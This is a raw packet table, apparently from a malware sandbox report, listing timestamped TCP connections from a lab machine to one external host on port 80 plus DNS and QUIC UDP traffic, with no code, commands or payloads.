Sep 1, 2024 06:31:42.990581036 CEST	49992	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:42.991138935 CEST	49993	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:43.001737118 CEST	80	49993	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:43.002878904 CEST	80	49992	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:43.006936073 CEST	49993	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:43.006936073 CEST	49992	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:43.023518085 CEST	49993	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:43.031064987 CEST	80	49993	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:44.099674940 CEST	80	49993	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:44.099729061 CEST	49993	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:44.099755049 CEST	80	49993	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:44.099797964 CEST	49993	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:44.206789017 CEST	49993	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:44.207154989 CEST	49994	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:44.585182905 CEST	49993	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:44.585928917 CEST	80	49993	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:44.585971117 CEST	49993	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:44.586921930 CEST	80	49994	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:44.586977959 CEST	49994	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:44.587451935 CEST	49994	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:44.587691069 CEST	80	49993	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:44.587734938 CEST	49993	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:44.596611023 CEST	80	49993	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:44.596626997 CEST	80	49994	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:45.359796047 CEST	80	49994	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:45.361932993 CEST	49994	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:45.475184917 CEST	49994	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:45.475486040 CEST	49995	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:45.485353947 CEST	80	49995	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:45.485547066 CEST	49995	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:45.485599995 CEST	80	49994	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:45.485657930 CEST	49994	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:45.485658884 CEST	49995	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:45.494751930 CEST	80	49995	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:46.252103090 CEST	80	49995	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:46.252151012 CEST	49995	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:46.358756065 CEST	49995	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:46.359126091 CEST	49996	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:46.364449024 CEST	80	49995	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:46.364497900 CEST	49995	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:46.364749908 CEST	80	49996	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:46.364808083 CEST	49996	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:46.364954948 CEST	49996	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:46.370981932 CEST	80	49996	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:46.371138096 CEST	49996	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:46.373960972 CEST	49997	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:46.379491091 CEST	80	49997	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:46.379545927 CEST	49997	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:46.379667044 CEST	49997	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:46.385642052 CEST	80	49997	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:47.966509104 CEST	80	49997	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:47.966566086 CEST	49997	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:47.966612101 CEST	80	49997	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:47.966622114 CEST	80	49997	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:47.966653109 CEST	49997	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:47.966676950 CEST	49997	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:48.077384949 CEST	49997	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:48.077709913 CEST	49998	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:48.083565950 CEST	80	49998	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:48.083619118 CEST	49998	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:48.083796024 CEST	49998	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:48.084026098 CEST	80	49997	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:48.084069967 CEST	49997	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:48.089602947 CEST	80	49998	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:48.853785992 CEST	80	49998	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:48.853843927 CEST	49998	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:48.856189966 CEST	49998	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:48.856441021 CEST	49999	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:48.861587048 CEST	80	49999	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:48.861656904 CEST	49999	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:48.861820936 CEST	49999	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:48.861843109 CEST	80	49998	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:48.861882925 CEST	49998	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:48.866956949 CEST	80	49999	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:49.634289980 CEST	80	49999	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:49.634954929 CEST	49999	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:49.751645088 CEST	49999	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:49.751662016 CEST	50000	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:49.756623983 CEST	80	50000	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:49.757067919 CEST	80	49999	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:49.757967949 CEST	49999	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:49.757973909 CEST	50000	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:49.758162022 CEST	50000	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:49.763753891 CEST	80	50000	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:50.502253056 CEST	80	50000	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:50.502305031 CEST	50000	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:50.505491018 CEST	50000	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:50.505857944 CEST	50001	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:50.510798931 CEST	80	50000	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:50.510808945 CEST	80	50001	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:50.510839939 CEST	50000	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:50.510891914 CEST	50001	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:50.511014938 CEST	50001	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:50.516154051 CEST	80	50001	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:51.288328886 CEST	80	50001	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:51.288430929 CEST	50001	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:51.406430960 CEST	50002	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:51.406430960 CEST	50001	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:51.413199902 CEST	80	50002	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:51.413844109 CEST	80	50001	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:51.413937092 CEST	50002	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:51.413937092 CEST	50001	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:51.414983034 CEST	50002	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:51.421758890 CEST	80	50002	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:52.182471991 CEST	80	50002	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:52.182545900 CEST	50002	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:52.186990976 CEST	50002	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:52.187411070 CEST	50003	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:52.193526030 CEST	80	50003	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:52.193624973 CEST	50003	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:52.193958998 CEST	80	50002	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:52.194014072 CEST	50002	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:52.195203066 CEST	50003	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:52.201234102 CEST	80	50003	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:52.939220905 CEST	80	50003	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:52.939275980 CEST	50003	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:53.048548937 CEST	50003	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:53.048549891 CEST	50004	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:53.053518057 CEST	80	50004	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:53.054069996 CEST	80	50003	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:53.058963060 CEST	50003	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:53.058964014 CEST	50004	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:53.059633970 CEST	50004	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:53.064409971 CEST	80	50004	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:53.830396891 CEST	80	50004	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:53.832974911 CEST	50004	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:53.835445881 CEST	50004	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:53.835472107 CEST	50005	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:53.840452909 CEST	80	50005	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:53.840862036 CEST	80	50004	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:53.840967894 CEST	50004	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:53.841026068 CEST	50005	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:53.841340065 CEST	50005	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:53.846263885 CEST	80	50005	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:54.588161945 CEST	80	50005	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:54.588249922 CEST	50005	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:55.125550985 CEST	50005	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:55.125973940 CEST	50006	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:55.130865097 CEST	80	50006	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:55.130884886 CEST	80	50005	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:55.130937099 CEST	50006	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:55.130992889 CEST	50005	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:55.131262064 CEST	50006	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:55.136115074 CEST	80	50006	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:55.870843887 CEST	80	50006	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:55.870933056 CEST	50006	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:55.873661995 CEST	50006	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:55.873671055 CEST	50007	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:55.878773928 CEST	80	50007	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:55.879427910 CEST	80	50006	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:55.879499912 CEST	50006	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:55.879502058 CEST	50007	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:55.879748106 CEST	50007	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:55.885046005 CEST	80	50007	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:56.637095928 CEST	80	50007	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:56.637150049 CEST	50007	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:56.750413895 CEST	50007	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:56.750756025 CEST	50008	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:56.765604019 CEST	50009	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:56.767890930 CEST	80	50008	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:56.767959118 CEST	50008	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:56.768115997 CEST	80	50007	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:56.768170118 CEST	50007	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:56.778928041 CEST	80	50009	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:56.778994083 CEST	50009	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:56.779114008 CEST	50009	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:31:56.788832903 CEST	80	50009	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:57.581684113 CEST	80	50009	185.215.113.19	192.168.2.5
Sep 1, 2024 06:31:57.581780910 CEST	50009	80	192.168.2.5	185.215.113.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 1, 2024 06:28:15.888235092 CEST	53	54527	1.1.1.1	192.168.2.5
Sep 1, 2024 06:28:16.710856915 CEST	55846	53	192.168.2.5	1.1.1.1
Sep 1, 2024 06:28:16.710978031 CEST	61792	53	192.168.2.5	1.1.1.1
Sep 1, 2024 06:28:18.088840008 CEST	53	64045	1.1.1.1	192.168.2.5
Sep 1, 2024 06:28:18.097683907 CEST	53	59969	1.1.1.1	192.168.2.5
Sep 1, 2024 06:28:19.905920982 CEST	64497	53	192.168.2.5	1.1.1.1
Sep 1, 2024 06:28:19.905920982 CEST	51263	53	192.168.2.5	1.1.1.1
Sep 1, 2024 06:28:19.906857014 CEST	56503	53	192.168.2.5	1.1.1.1
Sep 1, 2024 06:28:19.906857014 CEST	55620	53	192.168.2.5	1.1.1.1
Sep 1, 2024 06:28:19.907401085 CEST	62983	53	192.168.2.5	1.1.1.1
Sep 1, 2024 06:28:19.908147097 CEST	61431	53	192.168.2.5	1.1.1.1
Sep 1, 2024 06:28:19.908147097 CEST	58732	53	192.168.2.5	1.1.1.1
Sep 1, 2024 06:28:19.908402920 CEST	53758	53	192.168.2.5	1.1.1.1
Sep 1, 2024 06:28:19.912859917 CEST	53	64497	1.1.1.1	192.168.2.5
Sep 1, 2024 06:28:19.913860083 CEST	53	51263	1.1.1.1	192.168.2.5
Sep 1, 2024 06:28:19.914027929 CEST	53	56503	1.1.1.1	192.168.2.5
Sep 1, 2024 06:28:19.914532900 CEST	53	62983	1.1.1.1	192.168.2.5
Sep 1, 2024 06:28:19.914544106 CEST	53	55620	1.1.1.1	192.168.2.5
Sep 1, 2024 06:28:19.915407896 CEST	53	58732	1.1.1.1	192.168.2.5
Sep 1, 2024 06:28:19.915492058 CEST	53	61431	1.1.1.1	192.168.2.5
Sep 1, 2024 06:28:19.915971994 CEST	53	53758	1.1.1.1	192.168.2.5
Sep 1, 2024 06:28:20.065859079 CEST	62279	53	192.168.2.5	1.1.1.1
Sep 1, 2024 06:28:20.065859079 CEST	61732	53	192.168.2.5	1.1.1.1
Sep 1, 2024 06:28:20.083352089 CEST	53	61732	1.1.1.1	192.168.2.5
Sep 1, 2024 06:28:20.083615065 CEST	53	62279	1.1.1.1	192.168.2.5
Sep 1, 2024 06:28:21.571382046 CEST	57452	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:21.871718884 CEST	57452	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.021958113 CEST	443	57452	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.022048950 CEST	443	57452	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.022059917 CEST	443	57452	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.022548914 CEST	443	57452	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.022562027 CEST	443	57452	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.022841930 CEST	57452	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.024333954 CEST	57452	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.024734974 CEST	57452	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.024907112 CEST	57452	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.025408030 CEST	57452	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.025738001 CEST	57452	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.124937057 CEST	443	57452	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.125101089 CEST	443	57452	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.125895977 CEST	443	57452	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.125905037 CEST	443	57452	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.126107931 CEST	57452	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.126107931 CEST	57452	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.127183914 CEST	443	57452	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.127816916 CEST	443	57452	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.130116940 CEST	443	57452	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.130634069 CEST	443	57452	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.131053925 CEST	57452	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.223853111 CEST	443	57452	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.422816038 CEST	443	57452	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.427220106 CEST	57452	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.474731922 CEST	57452	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.474822044 CEST	57452	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.573787928 CEST	443	57452	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.574273109 CEST	443	57452	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.574743986 CEST	443	57452	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.575086117 CEST	57452	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.730048895 CEST	57452	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.730259895 CEST	57452	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:22.830424070 CEST	443	57452	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.830929041 CEST	443	57452	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.831429958 CEST	443	57452	172.64.41.3	192.168.2.5
Sep 1, 2024 06:28:22.831605911 CEST	57452	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:28:23.238413095 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.557944059 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.697233915 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.697355032 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.697933912 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.701606035 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.701751947 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.701762915 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.701981068 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.702343941 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.702927113 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.703938007 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.704042912 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.704380989 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.704391956 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.715286970 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.801002979 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.801017046 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.801112890 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.801512003 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.812957048 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.813213110 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.815790892 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.816199064 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.817871094 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.827080011 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.827398062 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.827538967 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:23.856087923 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:23.925590038 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:31.360445976 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:31.360496044 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:31.459824085 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:31.497241020 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:31.498068094 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:31.504662037 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:31.625931025 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:31.646163940 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:31.696916103 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:31.696969032 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:52.498477936 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:52.498527050 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:52.593029976 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:52.609003067 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:52.609253883 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:52.730691910 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:54.917897940 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:54.917932034 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:54.948467016 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:55.013313055 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:55.028014898 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:55.028229952 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:55.028568029 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:55.056055069 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:55.057744026 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:55.059613943 CEST	51513	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:28:55.148504019 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:28:55.179301977 CEST	443	51513	142.250.65.238	192.168.2.5
Sep 1, 2024 06:29:14.313142061 CEST	58571	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:14.615041971 CEST	58571	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:14.914668083 CEST	443	58571	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:14.914689064 CEST	443	58571	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:14.914699078 CEST	443	58571	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:14.915265083 CEST	443	58571	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:14.915276051 CEST	443	58571	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:14.916121006 CEST	58571	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:14.918003082 CEST	58571	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:14.918423891 CEST	58571	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:14.918564081 CEST	58571	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:14.918860912 CEST	58571	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:14.926568985 CEST	58571	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:15.019368887 CEST	443	58571	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:15.019629955 CEST	443	58571	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:15.019639969 CEST	443	58571	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:15.019648075 CEST	443	58571	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:15.019655943 CEST	443	58571	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:15.020128965 CEST	443	58571	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:15.020309925 CEST	58571	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:15.020376921 CEST	58571	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:15.023515940 CEST	443	58571	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:15.031038046 CEST	443	58571	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:15.031258106 CEST	443	58571	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:15.031979084 CEST	58571	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:15.122286081 CEST	443	58571	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:15.152265072 CEST	58571	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:16.724301100 CEST	52116	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:17.027095079 CEST	52116	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:17.176305056 CEST	443	52116	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:17.176440954 CEST	443	52116	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:17.176453114 CEST	443	52116	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:17.176897049 CEST	443	52116	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:17.176908016 CEST	443	52116	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:17.177063942 CEST	52116	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:17.178647041 CEST	52116	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:17.178781033 CEST	52116	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:17.178987026 CEST	52116	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:17.179092884 CEST	52116	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:17.273061037 CEST	443	52116	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:17.273169994 CEST	443	52116	162.159.61.3	192.168.2.5
